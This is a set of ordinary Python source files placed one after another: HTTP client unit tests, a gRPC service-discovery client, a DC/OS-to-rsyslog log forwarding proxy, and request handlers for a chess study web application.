# Mixing unicode in headers and byte string bodies shouldn't
# break anything
response = self.fetch("/echopost", method="POST", body=byte_body,
headers={"Content-Type": "application/blah"},
user_agent=u("foo"))
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
def test_types(self):
response = self.fetch("/hello")
self.assertEqual(type(response.body), bytes_type)
self.assertEqual(type(response.headers["Content-Type"]), str)
self.assertEqual(type(response.code), int)
self.assertEqual(type(response.effective_url), str)
def test_header_callback(self):
first_line = []
headers = {}
chunks = []
def header_callback(header_line):
if header_line.startswith('HTTP/'):
first_line.append(header_line)
elif header_line != '\r\n':
k, v = header_line.split(':', 1)
headers[k] = v.strip()
def streaming_callback(chunk):
# All header callbacks are run before any streaming callbacks,
# so the header data is available to process the data as it
# comes in.
self.assertEqual(headers['Content-Type'], 'text/html; charset=UTF-8')
chunks.append(chunk)
self.fetch('/chunk', header_callback=header_callback,
streaming_callback=streaming_callback)
self.assertEqual(len(first_line), 1)
self.assertRegexpMatches(first_line[0], 'HTTP/1.[01] 200 OK\r\n')
self.assertEqual(chunks, [b'asdf', b'qwer'])
def test_header_callback_stack_context(self):
exc_info = []
def error_handler(typ, value, tb):
exc_info.append((typ, value, tb))
return True
def header_callback(header_line):
if header_line.startswith('Content-Type:'):
1 / 0
with ExceptionStackContext(error_handler):
self.fetch('/chunk', header_callback=header_callback)
self.assertEqual(len(exc_info), 1)
self.assertIs(exc_info[0][0], ZeroDivisionError)
def test_configure_defaults(self):
defaults = dict(user_agent='TestDefaultUserAgent')
# Construct a new instance of the configured client class
client = self.http_client.__class__(self.io_loop, force_instance=True,
defaults=defaults)
client.fetch(self.get_url('/user_agent'), callback=self.stop)
response = self.wait()
self.assertEqual(response.body, b'TestDefaultUserAgent')
client.close()
def test_304_with_content_length(self):
# According to the spec 304 responses SHOULD NOT include
# Content-Length or other entity headers, but some servers do it
# anyway.
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.5
response = self.fetch('/304_with_content_length')
self.assertEqual(response.code, 304)
self.assertEqual(response.headers['Content-Length'], '42')
def test_final_callback_stack_context(self):
# The final callback should be run outside of the httpclient's
# stack_context. We want to ensure that there is no stack_context
# between the user's callback and the IOLoop, so monkey-patch
# IOLoop.handle_callback_exception and disable the test harness's
# context with a NullContext.
# Note that this does not apply to secondary callbacks (header
# and streaming_callback), as errors there must be seen as errors
# by the http client so it can clean up the connection.
exc_info = []
def handle_callback_exception(callback):
exc_info.append(sys.exc_info())
self.stop()
self.io_loop.handle_callback_exception = handle_callback_exception
with NullContext():
self.http_client.fetch(self.get_url('/hello'),
lambda response: 1 / 0)
self.wait()
self.assertEqual(exc_info[0][0], ZeroDivisionError)
@gen_test
def test_future_interface(self):
response = yield self.http_client.fetch(self.get_url('/hello'))
self.assertEqual(response.body, b'Hello world!')
@gen_test
def test_future_http_error(self):
try:
yield self.http_client.fetch(self.get_url('/notfound'))
except HTTPError as e:
self.assertEqual(e.code, 404)
self.assertEqual(e.response.code, 404)
@gen_test
def test_reuse_request_from_response(self):
# The response.request attribute should be an HTTPRequest, not
# a _RequestProxy.
# This test uses self.http_client.fetch because self.fetch calls
# self.get_url on the input unconditionally.
url = self.get_url('/hello')
response = yield self.http_client.fetch(url)
self.assertEqual(response.request.url, url)
self.assertTrue(isinstance(response.request, HTTPRequest))
response2 = yield self.http_client.fetch(response.request)
self.assertEqual(response2.body, b'Hello world!')
class RequestProxyTest(unittest.TestCase):
def test_request_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/',
user_agent='foo'),
dict())
self.assertEqual(proxy.user_agent, 'foo')
def test_default_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict(network_interface='foo'))
self.assertEqual(proxy.network_interface, 'foo')
def test_both_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/',
proxy_host='foo'),
dict(proxy_host='bar'))
self.assertEqual(proxy.proxy_host, 'foo')
def test_neither_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict())
self.assertIs(proxy.auth_username, None)
def test_bad_attribute(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict())
with self.assertRaises(AttributeError):
proxy.foo
def test_defaults_none(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'), None)
self.assertIs(proxy.auth_username, None)
class HTTPResponseTestCase(unittest.TestCase):
def test_str(self):
response = HTTPResponse(HTTPRequest('http://example.com'),
200, headers={}, buffer=BytesIO())
s = str(response)
self.assertTrue(s.startswith('HTTPResponse('))
self.assertIn('code=200', s)
class SyncHTTPClientTest(unittest.TestCase):
def setUp(self):
if IOLoop.configured_class().__name__ == 'TwistedIOLoop':
# TwistedIOLoop only supports the global reactor, so we can't have
# separate IOLoops for client and server threads.
raise unittest.SkipTest(
'Sync HTTPClient not compatible with TwistedIOLoop')
self.server_ioloop = IOLoop()
sock, self.port = bind_unused_port()
app = Application([('/', HelloWorldHandler)])
server = HTTPServer(app, io_loop=self.server_ioloop)
server.add_socket(sock)
self.server_thread = threading.Thread(target=self.server_ioloop.start)
self.server_thread.start()
self.http_client = HTTPClient()
def tearDown(self):
self.server_ioloop.add_callback(self.server_ioloop.stop)
self.server_thread.join()
self.server_ioloop.close(all_fds=True)
def get_url(self, path):
return 'http://localhost:%d%s' % (self.port, path)
def test_sync_client(self):
response = self.http_client.fetch(self.get_url('/'))
self.assertEqual(b'Hello world!', response.body)
def test_sync_client_error(self):
# Synchronous HTTPClient raises errors directly; no need for
# response.rethrow()
with self.assertRaises(HTTPError) as assertion:
self.http_client.fetch(self.get_url('/notfound'))
self.assertEqual(assertion.exception.code, 404)
|
discovery_client.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import distill_discovery_pb2 as discovery
from . import distill_discovery_pb2_grpc
import functools
import grpc
import logging
import os
import random
import threading
import time
from ..discovery.server_alive import is_server_alive
logging.basicConfig(
level=logging.DEBUG,
format="[%(levelname)s %(asctime)s %(filename)s:%(lineno)d] %(message)s")
def _handle_errors(f):
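# Decorator: retry a failing gRPC stub call up to 3 times, reconnecting the
# channel via the owning client (args[0]._connect()) before each retry; if all
# attempts raise grpc.RpcError the wrapped call returns None.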
def handler(*args, **kwargs):
retry_times = 3
for i in range(retry_times):
if i > 0:
args[0]._connect()
try:
return f(*args, **kwargs)
except grpc.RpcError as e:
logging.warning('grpc failed with {0}: {1}'.format(e.code(
), e.details()))
return functools.wraps(f)(handler)
class DiscoveryClient(object):
def __init__(self, endpoints, service_name, require_num, token=None):
self._channel = None
self._stub = None
self._client = None
self._service_name = service_name
self._require_num = require_num
self._token = token
self._version = 0
self._ret_servers = []
self._discovery_version = 0
self._discovery_servers = endpoints
self._discover = None
self._beat_thread = None
self._stop_event = threading.Event()
self._is_registered = False
self._funcs = {
discovery.Code.OK: self._process_ok,
discovery.Code.UNKNOWN: self._error,
discovery.Code.NO_READY: self._process_no_ready,
discovery.Code.REDIRECT: self._process_redirect,
discovery.Code.INVALID_ARGUMENT: self._error,
discovery.Code.ALREADY_REGISTER: self._process_already_register,
discovery.Code.REGISTER_OTHER_SERVICE: self._error,
discovery.Code.UNREGISTERED: self._process_unregistered,
discovery.Code.UNAUTHORIZED: self._error,
}
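# _process_response dispatches on response.status.code through this table;
# a code missing from the table trips the assert in _process_response.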
def _error(self, response):
logging.error('client={} service={} error code={}'.format(
self._client, self._service_name, response.status.code))
assert False
def _process_ok(self, response):
if not self._is_registered:
self._is_registered = True
logging.debug('client={} register success'.format(self._client))
if response.version > self._version:
self._ret_servers = response.servers
self._version = response.version
logging.info('service version={} servers={}'.format(
self._version, self._ret_servers))
if response.discovery_version > self._discovery_version:
self._discovery_servers = response.discovery_servers
self._discovery_version = response.discovery_version
logging.info('discovery_version={} servers={}'.format(
self._discovery_version, self._discovery_servers))
def _process_no_ready(self, response):
logging.info('discovery server={} is not ready'.format(self._discover))
pass
def _process_redirect(self, response):
self._is_registered = False
old_discover = self._discover
self._discover = response.status.message
self._discovery_servers = response.discovery_servers
self._discovery_version = response.discovery_version
self._version = 0
logging.info('redirect discovery server, old={} new={}'.format(
old_discover, self._discover))
# reconnect
self._connect()
def _process_already_register(self, response):
logging.info('already register')
pass
def _process_unregistered(self, response):
self._is_registered = False
def _process_response(self, response):
assert response.status.code in self._funcs
self._funcs[response.status.code](response)
@_handle_errors
def _stub_register(self, register_request):
return self._stub.Register(register_request)
@_handle_errors
def _stub_heartbeat(self, beat_request):
return self._stub.HeartBeat(beat_request)
def _register(self):
register_request = discovery.RegisterRequest(
client=self._client,
service_name=self._service_name,
require_num=self._require_num,
token=self._token)
logging.debug(
'register client={} service_name={} require_num={} token={}'.
format(self._client, self._service_name, self._require_num,
self._token))
response = self._stub_register(register_request)
self._process_response(response)
def _heartbeat(self):
while not self._stop_event.is_set():
if not self._is_registered:
self._register()
beat_request = discovery.HeartBeatRequest(
client=self._client,
version=self._version,
discovery_version=self._discovery_version)
response = self._stub_heartbeat(beat_request)
self._process_response(response)
time.sleep(2)
def _gen_client(self, addr, channel):
ip = addr[0]
pid = os.getpid()
sid = hex(id(channel))
time_stamp = int(time.time() * 1000)
# FIXME. client_uuid=ip-pid-_channel_id-timestamp, need a better method?
self._client = '{}-{}-{}-{}'.format(ip, pid, sid, time_stamp)
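# Illustrative result (values are made up): '10.1.2.3-4242-0x7f3c2a1b0d60-1620000000000'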
def _connect_server(self, server):
channel = None
retry_times = 3
for i in range(retry_times):
alive, client_addr = is_server_alive(server)
if alive:
channel = grpc.insecure_channel(server)
if self._client is None:
self._gen_client(client_addr, channel)
break
logging.warning(
'discovery server={} is not alive, failed_count={}'.format(
server, i + 1))
time.sleep(0.1 * (i + 1))
return channel
def _connect(self):
# close the previous channel
if self._channel is not None:
self._channel.close()
channel = None
if self._discover is not None:
channel = self._connect_server(self._discover)
if channel is None:
endpoints = list(self._discovery_servers)
random.shuffle(endpoints)
for ep in endpoints:
channel = self._connect_server(ep)
if channel is not None:
break
assert channel is not None, 'connect with discovery failed'
self._channel = channel
self._stub = distill_discovery_pb2_grpc.DiscoveryServiceStub(
self._channel)
def start(self, daemon=True):
if self._channel is not None:
return
assert self._channel is None
assert self._stub is None
self._connect()
self._beat_thread = threading.Thread(target=self._heartbeat)
self._beat_thread.daemon = daemon
self._beat_thread.start()
def stop(self):
if self._channel is None:
return
self._stop_event.set()
self._beat_thread.join()
self._stop_event.clear()
self._stub = None
self._channel.close()
self._channel = None
def get_servers(self):
return self._ret_servers
if __name__ == '__main__':
client = DiscoveryClient(['127.0.0.1:50051', '127.0.0.1:50052'],
'TestService', 4)
# client = DiscoveryClient(['127.0.0.1:50051'], 'TestService2', 4)
client.start(daemon=True)
for i in range(1000):
servers = client.get_servers()
print(servers)
time.sleep(1)
|
dcos_rsyslog_tcp_proxy.py
|
#!/usr/bin/env python3.6
# Brief: Logs Proxy between DC/OS and Rsyslog
# Author: Alejandro Villegas Lopez <avillegas@keedio.com>
################################################################################
# Libraries
import json
import socket
import time
import threading
import argparse
import logging
import errno
import os
import sys
from systemd.journal import JournaldLogHandler
# MAX Connections from DC/OS Journal
MAX_CONNECTIONS=10
logger=None
def send (rsyslog_socket, data):
""" Send data to rsyslog socket """
logger.debug("Sending data: %s", data)
print("\nSend Data: " + data)
rsyslog_socket.send((data + "\n").encode("utf-8"))
def get_first_json(str_err, data):
""" Return the first JSON struct in data buffer """
# Index of Error string with the index of the next JSON struct
extra_data_msg_index = str_err.find("char", 0, len(str_err)) + 5
next_msg_index = str_err[extra_data_msg_index:-1]
# Extract the first JSON struct
return data[0:int(next_msg_index)]
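# Illustrative example: for data = '{"a":1}{"b":2}', json.loads raises
# "Extra data: line 1 column 8 (char 7)"; the digits after "char " are "7",
# so the first struct is data[0:7] == '{"a":1}' and '{"b":2}' stays in the
# buffer for the next pass.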
def process_data (rsyslog_socket, data):
""" Process the data buffer readed from TCP socket """
# No data recived
if len(data) == 0:
return ""
# Process Data Buffer
while 1:
try:
# LookUp a JSON struct
json.loads(data)
except json.decoder.JSONDecodeError as e:
# Error String
str_err = str(e)
if str_err.startswith("Extra data:"):
json_msg = get_first_json (str_err, data)
data = data[len(json_msg):]
# Send Data
send(rsyslog_socket, json_msg)
logger.debug("Buffered Data: %d", len(json_msg))
elif str_err.startswith("Unterminated string starting at:"):
break
else:
logger.error(str_err)
break
except:
logger.error(sys.exc_info()[0])
else:
# Send Data
send(rsyslog_socket, data)
# Clean Data buffer
data=""
break
return data
def worker (conn, addr, rsyslog_socket, buffer_read_size):
""" Read from the TCP buffer and lookup for one valid JSON struct. When a
JSON struct is find, it sends to Rsyslog and start over
"""
data=""
# Read from socket forever
while 1:
data = data + conn.recv(buffer_read_size).decode("utf-8")
# Connection Closed
if not data:
logger.debug("Connection Closed")
break
else:
data = process_data(rsyslog_socket, data)
conn.close()
def run (dcos_ip, dcos_port, rsyslog_ip, rsyslog_port, buffer_read_size):
""" Open sockets and create threads for process the messages of each connection """
# Output Socket to "rsyslog"
logger.info("Connecting to Rsyslog: %s:%d", rsyslog_ip, rsyslog_port)
rsyslog_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
rsyslog_socket.connect((rsyslog_ip, rsyslog_port))
except socket.error as err:
if err.errno == errno.ECONNREFUSED:
logger.error("Can't connect to Rsyslog")
else:
logger.info("Connected to Rsyslog!")
# Input Socket from "mesos-journal"
logger.info("Binding to %s:%d to recive DC/OS Journal logs", dcos_ip, dcos_port)
dcos_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dcos_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
dcos_socket.bind((dcos_ip, dcos_port))
except socket.error as err:
logger.error("Can't Bind to %s:%d", dcos_ip, dcos_port)
return
else:
dcos_socket.listen(MAX_CONNECTIONS)
logger.info("Accepting connections")
while 1:
conn, addr = dcos_socket.accept()
thread = threading.Thread(target=worker, args=(conn, addr, rsyslog_socket, buffer_read_size), daemon=True)
thread.start()
logger.debug("New Connection from %s", addr)
if __name__ == "__main__":
""" Parse Arguments, configure logging and run the app """
# Arguments parsing
parser = argparse.ArgumentParser(description='DC/OS Container Logs - Rsyslog Proxy')
parser.add_argument('--dcos-journal-ip', default="127.0.0.1", help='DC/OS Journal for container logs IP')
parser.add_argument('--dcos-journal-port', default=61092, help='DC/OS Journal for container logs Port')
parser.add_argument('--rsyslog-ip', default="127.0.0.1", help='System Rsyslog IP')
parser.add_argument('--rsyslog-port', default=61093, type=int, help='System Rsyslog Port')
parser.add_argument('--buffer-read-size', default=1024, type=int, help='TCP Buffer read size')
parser.add_argument('-v', '--verbose', default=False, action='store_true', help='Verbose mode')
parser.add_argument('-q', '--quiet', default=False, action='store_true', help='Quiet mode')
args = parser.parse_args()
# Detach from the terminal by closing the standard file descriptors
# Close stdin
os.close(0)
# Close stdout
os.close(1)
# Close stderr
os.close(2)
# Logger configuration
log_level=0
if args.verbose:
log_level=logging.DEBUG
elif args.quiet:
log_level=logging.ERROR
else:
log_level=logging.INFO
logger = logging.getLogger(__name__)
journald_handler = JournaldLogHandler()
journald_handler.setFormatter(logging.Formatter("[%(levelname)s](%(asctime)s): %(message)s"))
logger.addHandler(journald_handler)
logger.setLevel(log_level)
logger.debug("##-> DC/OS Journal IP: %s", args.dcos_journal_ip)
logger.debug("##-> DC/OS Journal Port: %d", args.dcos_journal_port)
logger.debug("##-> Rsyslog IP: %s", args.rsyslog_ip)
logger.debug("##-> Rsyslog Port: %d", args.rsyslog_port)
# Run Daemon
run(args.dcos_journal_ip, args.dcos_journal_port, args.rsyslog_ip, args.rsyslog_port, args.buffer_read_size)
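# Deployment note (assumption, not part of the original script): rsyslog must be
# listening on the --rsyslog-port TCP port for the proxy to have somewhere to
# forward the journal entries. A minimal rsyslog.conf sketch could look like:
#
#   module(load="imtcp")
#   input(type="imtcp" port="61093")
#
# The port number here is only an example; it has to match --rsyslog-port.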
|
serverlogic.py
|
###################################################################
from traceback import print_exc as pe
import uuid
import time
import os
from threading import Thread
import requests
import json
import chess
import random
###################################################################
import utils.file
from utils.logger import log
from utils.http import geturl
from utils.study import Study, DEFAULT_MAX_PLIES, Book, BookMove, BookPosition, LichessGame, getvariantboard, get_zobrist_key_hex
from utils.cryptography import encryptalphanum, decryptalphanum
from utils.file import read_json_from_fdb, write_json_to_fdb, delfdb, read_json_from_fdb, fdb
from utils.engine import UciEngine, AnalyzeJob, TimeControl
from utils.config import SERVER_URL, KEEP_ALIVE, IS_PROD, ENGINE_WORKING_DIR, ENGINE_EXECUTABLE_NAME, FREE_ANALYSIS
from utils.logger import SystemLog
from utils.http import posturl
###################################################################
SERVERLOGIC_VERBOSE = True
SCAN_PLAYER_LIST = os.environ.get("SCANPLAYERS", "jwaceking,Wolfram_EP,letzplaykrazy,HigherBrainPattern,Natso,sutcunuri,kreedz,Xeransis,Illion")
SCAN_PLAYER_LIST += ("," + os.environ["EXTRAPLAYERS"]) if os.environ.get("EXTRAPLAYERS") else ""
MAX_BOOK_GAMES = int(os.environ.get("MAXBOOKGAMES", 500))
PRE_MIN_PLIES = int(os.environ.get("PREMINPLIES", 10))
MAX_BOOK_PLIES = int(os.environ.get("MAXBOOKPLIES", 30))
PRE_FILTER_VERSION = int(os.environ.get("PREFILTERVERION", 1))
BOOK_FILTER_VERSION = int(os.environ.get("BOOKFILTERVERION", 2))
MAX_DOWNLOAD_GAMES = int(os.environ.get("MAXDOWNLOADGAMES", 100))
PRE_MIN_RATING = int(os.environ.get("PREMINRATING", 2200))
BOOK_MIN_RATING = int(os.environ.get("BOOKMINRATING", 2200))
MAX_NDJSON_SIZE = int(os.environ.get("MAXNDJSONSIZE", 1000))
BUILD_BOOK_DELAY = int(os.environ.get("BUILDBOOKDELAY", 6 * 3600))
###################################################################
def createuuid():
return uuid.uuid1().hex
###################################################################
class FirestoreDb(utils.file.Db):
def __init__(self):
super(FirestoreDb, self).__init__()
db = FirestoreDb()
bot = None
###################################################################
mainengine = None
mainenginelog = SystemLog()
def newengine_func():
global mainengine, mainenginelog
if mainengine:
mainengine.kill()
mainengine = UciEngine(ENGINE_WORKING_DIR(), ENGINE_EXECUTABLE_NAME(), "mainengine", mainenginelog)
mainengine.open()
###################################################################
PRIVILEGES = [
"admin",
"analyze"
]
class User():
def __init__(self, blob = {}):
if not blob:
blob = {}
self.fromblob(blob)
def canbasic(self, privilege):
envname = "CAN" + privilege.upper()
if envname in os.environ:
canstr = os.environ[envname]
canlist = canstr.split(",")
if self.uid in canlist:
return True
return False
def can(self, privilege):
if self.canbasic("admin"):
return True
return self.canbasic(privilege)
def fromblob(self, blob):
self.uid = blob.get("uid", "anonuser")
self.code = encryptalphanum(self.uid)
self.username = blob.get("username", "Anonymous")
self.createdat = blob.get("createdat", time.time())
self.verifiedat = blob.get("verifiedat", None)
self.lastactiveat = blob.get("lastactiveat", time.time())
self.verification = blob.get("verification", None)
self.privileges = {}
for privilege in PRIVILEGES:
self.privileges[privilege] = self.can(privilege)
def toblob(self):
return {
"uid": self.uid,
"code": self.code,
"username": self.username,
"createdat": self.createdat,
"verifiedat": self.verifiedat,
"lastactiveat": self.lastactiveat,
"verification": self.verification,
"privileges": self.privileges
}
def dbpath(self):
return "users/" + self.uid
def fromdb(self):
self.fromblob(db.getpath(self.dbpath()))
def storedb(self):
db.setdoc(self.dbpath(), self.toblob())
def indb(self):
return db.getpath(self.dbpath())
def __repr__(self):
return f"< user [ {self.uid} | {self.username} | admin : {self.can('admin')} ] >"
###################################################################
class Req():
def __init__(self, reqobj):
self.reqobj = reqobj
self.queryparams = reqobj.get("queryparams", {})
self.task = self.queryparams.get("task", None)
self.kind = reqobj.get("kind", "dummy")
self.userblob = reqobj.get("user", {})
self.user = User(self.userblob)
self.verifyusername = reqobj.get("verifyusername", None)
self.title = reqobj.get("title", None)
self.variantkey = reqobj.get("variantkey", "standard")
self.id = reqobj.get("id", None)
self.nodeid = reqobj.get("nodeid", None)
self.algeb = reqobj.get("algeb", None)
self.pgn = reqobj.get("pgn", None)
self.moves = reqobj.get("moves", None)
self.drawings = reqobj.get("drawings", None)
self.message = reqobj.get("message", None)
self.nags = reqobj.get("nags", None)
self.duration = reqobj.get("duration", None)
self.weightkind = reqobj.get("weightkind", "me")
self.weight = reqobj.get("weight", 0)
self.maxplies = reqobj.get("maxplies", DEFAULT_MAX_PLIES)
self.ignorecomments = reqobj.get("ignorecomments", False)
self.ignoredrawings = reqobj.get("ignoredrawings", False)
self.ignoretrainweights = reqobj.get("ignoretrainweights", False)
self.success = reqobj.get("success", 0)
self.player = reqobj.get("player", None)
self.command = reqobj.get("command", None)
self.fen = reqobj.get("fen", None)
self.multipv = reqobj.get("multipv", 1)
self.zobristkeyhex = reqobj.get("zobristkeyhex", None)
self.blob = reqobj.get("blob", None)
self.username = reqobj.get("username", None)
self.initial = reqobj.get("initial", None)
self.increment = reqobj.get("increment", None)
self.rated = reqobj.get("rated", None)
self.color = reqobj.get("color", None)
if SERVERLOGIC_VERBOSE:
log(self, "warning")
if not db.getpath("users/" + self.user.uid):
self.user = User()
uid = createuuid()
self.user.uid = uid
self.user.createdat = time.time()
if SERVERLOGIC_VERBOSE:
log(f"< anonuser in request, creating new user < {uid} > >", "error")
if self.user.indb():
self.user.fromdb()
if SERVERLOGIC_VERBOSE:
log("< user found in db >", "success")
self.user.lastactiveat = time.time()
self.user.storedb()
def studiespath(self):
return "users/" + self.user.uid + "/studies"
def studypath(self, study):
return self.studiespath() + "/" + study.id
def res(self, resobj):
if not ("user" in resobj):
resobj["user"] = self.user.toblob()
return resobj
def __repr__(self):
return f"< request [ {self.kind} | {self.queryparams} | {self.user} ] >"
###################################################################
###################################################################
# json api handlers
def dummy(req):
return {
"kind": "dummydone"
}
def connected(req):
if req.task == "importstudy":
importstudy(req)
return {
"kind": "connectedack",
"freeanalysis": FREE_ANALYSIS(),
"players": SCAN_PLAYER_LIST.split(",")
}
def login(req):
req.user.verification = {
"username": req.verifyusername,
"code": createuuid()
}
req.user.storedb()
return {
"kind": "login"
}
def verify(req):
username = req.user.verification["username"]
code = req.user.verification["code"]
if SERVERLOGIC_VERBOSE:
log(f"< verifying user < {username} > code < {code} > >", "info")
try:
content = geturl("https://lichess.org/@/" + username)
if SERVERLOGIC_VERBOSE:
log(f"< received content < {len(content)} characters > >", "info")
if code in content:
if SERVERLOGIC_VERBOSE:
log(f"< code found in content >", "success")
req.user.username = username
req.user.verifiedat = time.time()
req.user.verification = None
allusers = db.getpath("users")
for id, userblob in allusers.items():
if userblob["username"] == username:
newuid = userblob["uid"]
if SERVERLOGIC_VERBOSE:
log(f"< user already exists, changing uid to < {newuid} > >", "warning")
req.user.uid = newuid
break
req.user.storedb()
return {
"kind": "verified"
}
except:
pe()
if SERVERLOGIC_VERBOSE:
log(f"< there was a problem verifying user >", "error")
if SERVERLOGIC_VERBOSE:
log(f"< verification failed >", "error")
return {
"kind": "verificationfailed",
"alert": {
"msg": "Verification failed !",
"kind": "error"
}
}
def cancelverification(req):
req.user.verification = None
req.user.storedb()
return {
"kind": "verificationcanceled"
}
def getstudies(req):
if not db.getpath(req.studiespath()):
log("< no studies, creating default >", "warning")
defaultstudy = Study({
"selected": True
})
db.setdoc(req.studypath(defaultstudy), defaultstudy.toblob(nodelist = True))
studies = db.getpath(req.studiespath())
studiesblob = {}
for id, studyblob in studies.items():
study = Study(studyblob)
studiesblob[id] = study.toblob(nodelist = study.selected)
return {
"kind": "setstudies",
"studies": studiesblob
}
def unselectstudies(req, selectid = None, nodeid = None):
studies = db.getpath(req.studiespath())
if not studies:
return
for id, studyblob in studies.items():
study = Study(studyblob)
if study.selected:
if SERVERLOGIC_VERBOSE:
log(f"< unselecting study < {id} > >", "info")
study.selected = False
storestudy(req, study)
if selectid == id:
if SERVERLOGIC_VERBOSE:
log(f"< selecting study < {id} | {nodeid} > >", "info")
study.selected = True
if nodeid:
study.selectnodebyid(nodeid)
storestudy(req, study)
def createstudy(req):
id = createuuid()
study = Study({
"title": req.title,
"variantkey": req.variantkey,
"id": id,
"selected": True
})
unselectstudies(req)
storestudy(req, study)
if SERVERLOGIC_VERBOSE:
log(f"< created study < {req.title} | {id} > >", "success")
return {
"kind": "studycreated"
}
def clonestudy(req):
log(f"< cloning study < {req.id} > >", "info")
study = getstudy(req)
if not study:
return {
"kind": "clonestudyfailed",
"status": "no such study"
}
study.id = createuuid()
study.createdat = time.time()
req.id = study.id
storestudy(req, study)
unselectstudies(req, selectid = req.id)
if SERVERLOGIC_VERBOSE:
log(f"< cloned study < {req.id} > >", "success")
return {
"kind": "studycloned"
}
def deletestudy(req):
if req.id == "default":
return {
"kind": "studydeletefailed",
"status": "default study cannot be deleted",
"alert": {
"msg": "The default study cannot be deleted !",
"kind": "error"
}
}
unselectstudies(req, selectid = "default")
study = Study({"id": req.id})
db.deletedoc(req.studypath(study))
return {
"kind": "studydeleted"
}
def getstudy(req):
study = Study({"id": req.id})
blob = db.getpath(req.studypath(study))
if not blob:
return None
study = Study(blob)
return study
def storestudy(req, study):
db.setdoc(req.studypath(study), study.toblob(nodelist = True))
def editstudytitle(req):
if req.id == "default":
return {
"kind": "editstudytitlefailed",
"status": "default study's title cannot be edited",
"alert": {
"msg": "The default study's title cannot be edited !",
"kind": "error"
}
}
study = getstudy(req)
if not study:
return {
"kind": "editstudytitlefailed",
"status": "fatal no such study",
"alert": {
"msg": "The default study's title cannot be edited !",
"kind": "error"
}
}
study.title = req.title
storestudy(req, study)
return {
"kind": "studytitleedited"
}
def selectstudy(req, nodeid = None):
unselectstudies(req, selectid = req.id, nodeid = nodeid)
return {
"kind": "studyselected"
}
def makealgebmove(req):
log(f"< making algeb move < {req.algeb} | {req.id} > >", "info")
study = getstudy(req)
study.makealgebmove(req.algeb)
storestudy(req, study)
return {
"kind": "algebmovemade",
"setstudy": study.toblob(nodelist = True)
}
def setcurrentnode(req):
log(f"< setting current node < {req.id} | {req.nodeid} > >", "info")
study = getstudy(req)
if study.selectnodebyid(req.nodeid):
storestudy(req, study)
return {
"kind": "currentnodeset",
"currentnodeid": study.currentnodeid
}
else:
return {
"kind": "setcurrentnodefailed",
"nodeid": req.nodeid
}
def parsepgn(req):
log(f"< parsing pgn < {req.id} | {req.pgn} > >", "info")
study = getstudy(req)
study.parsepgn(req.pgn)
storestudy(req, study)
return {
"kind": "pgnparsed",
"setstudy": study.toblob(nodelist = True)
}
def mergemoves(req):
log(f"< merging moves < {req.id} | max plies {req.maxplies} | ignore comments {req.ignorecomments} | ignore drawings {req.ignoredrawings} | ignore trainweights {req.ignoretrainweights} | moves {req.moves} > >", "info")
study = getstudy(req)
study.mergemoves(req.moves, req.maxplies, ignorecomments = req.ignorecomments, ignoredrawings = req.ignoredrawings, ignoretrainweights = req.ignoretrainweights)
storestudy(req, study)
return {
"kind": "movesmerged",
"setstudy": study.toblob(nodelist = True)
}
def setdrawings(req):
log(f"< setting drawings < {req.id} | {req.drawings} > >", "info")
study = getstudy(req)
study.setdrawings(req.drawings)
storestudy(req, study)
return {
"kind": "drawingsset",
"pgn": study.reportpgn()
}
def setsuccess(req):
log(f"< setting success < {req.id} | {req.nodeid} | {req.success} > >", "info")
study = getstudy(req)
if study.setsuccess(req.nodeid, req.success):
storestudy(req, study)
return {
"kind": "successset",
"success": req.success
}
else:
return {
"kind": "setsuccessfailed"
}
def savemessage(req):
log(f"< save message < {req.id} | {req.nodeid} | {req.message} > >", "info")
study = getstudy(req)
if study.setmessage(req.nodeid, req.message):
storestudy(req, study)
return {
"kind": "messagesaved",
"message": req.message,
"pgn": study.reportpgn()
}
else:
return {
"kind": "messagesavefailed"
}
def savenags(req):
log(f"< save nags < {req.id} | {req.nodeid} | {req.nags} > >", "info")
study = getstudy(req)
if study.setnags(req.nodeid, req.nags):
storestudy(req, study)
return {
"kind": "nagssaved",
"nags": req.nags,
"pgn": study.reportpgn()
}
else:
return {
"kind": "nagssavefailed"
}
def settrainweight(req):
log(f"< set train weight < {req.id} | {req.nodeid} | {req.weightkind} | {req.weight} > >", "info")
study = getstudy(req)
if study.settrainweight(req.nodeid, req.weightkind, req.weight):
storestudy(req, study)
return {
"kind": "trainweightset",
"weightkind": req.weightkind,
"weight": req.weight,
"pgn": study.reportpgn()
}
else:
return {
"kind": "settrainweightfailed"
}
def saveduration(req):
log(f"< save duration < {req.id} | {req.nodeid} | {req.duration} > >", "info")
study = getstudy(req)
if study.setduration(req.nodeid, req.duration):
storestudy(req, study)
return {
"kind": "durationsaved",
"duration": req.duration
}
else:
return {
"kind": "durationsavefailed"
}
def flipstudy(req):
log(f"< flipping < {req.id} > >", "info")
study = getstudy(req)
study.setflip(not study.flip)
storestudy(req, study)
return {
"kind": "studyflipped",
"setstudy": study.toblob(nodelist = True)
}
def reset(req):
log(f"< reset < {req.id} > >", "info")
study = getstudy(req)
study.reset()
storestudy(req, study)
return {
"kind": "resetdone",
"setstudy": study.toblob(nodelist = True)
}
def selectnodebyid(req):
log(f"< selecting node by id < {req.id} | {req.nodeid} > >", "info")
study = getstudy(req)
study.selectnodebyid(req.nodeid)
storestudy(req, study)
return {
"kind": "nodeselectedbyid",
"setstudy": study.toblob(nodelist = True)
}
def back(req):
log(f"< back < {req.id} > >", "info")
study = getstudy(req)
study.back()
storestudy(req, study)
return {
"kind": "backdone",
"setstudy": study.toblob(nodelist = True)
}
